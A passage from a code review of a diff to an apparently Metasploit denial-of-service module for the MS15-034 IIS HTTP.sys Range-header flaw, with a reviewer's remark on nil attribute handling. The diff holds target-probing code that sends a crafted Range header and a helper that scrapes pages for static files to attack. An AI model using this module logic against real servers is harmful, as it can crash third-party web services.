modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb

```diff
@@ -111,25 +110,69 @@ def dos_host(ip)
     print_status("#{ip}:#{rport} - DOS request sent")
   end
 
+  def potential_static_files_uris
+    uri = normalize_uri(target_uri.path)
 
-  def check_host(ip)
-    return Exploit::CheckCode::Unknown if get_file_size(ip) == -1
+    return [uri] unless uri[-1, 1] == '/'
 
-    uri = normalize_uri(target_uri.path)
-    res = send_request_raw({
-      'uri' => uri,
-      'method' => 'GET',
-      'headers' => {
-        'Range' => "bytes=0-#{upper_range}"
-      }
-    })
-    if res && res.body.include?('Requested Range Not Satisfiable')
-      return Exploit::CheckCode::Vulnerable
-    elsif res && res.body.include?('The request has an invalid header name')
-      return Exploit::CheckCode::Safe
-    else
-      return Exploit::CheckCode::Unknown
+    uris = ["#{uri}welcome.png"]
+    res  = send_request_raw('uri' => uri, 'method' => 'GET')
+
+    return uris unless res
+
+    site_uri = URI.parse(full_uri)
+
+    Nokogiri::HTML(res.body).xpath('//link|//script|//style|//img').each do |tag|
+      %w(href src).each do |attribute|
+        begin
+          attr_value = tag[attribute]
+
+          next unless attr_value && !attr_value.empty?
```

Comment:
I would agree due to the rescue, however if the tag does not have the attribute (e.g and img checked for href), then attr_value will be nil, and your attr_value.blank? would raise an error, as well as the attr_value.strip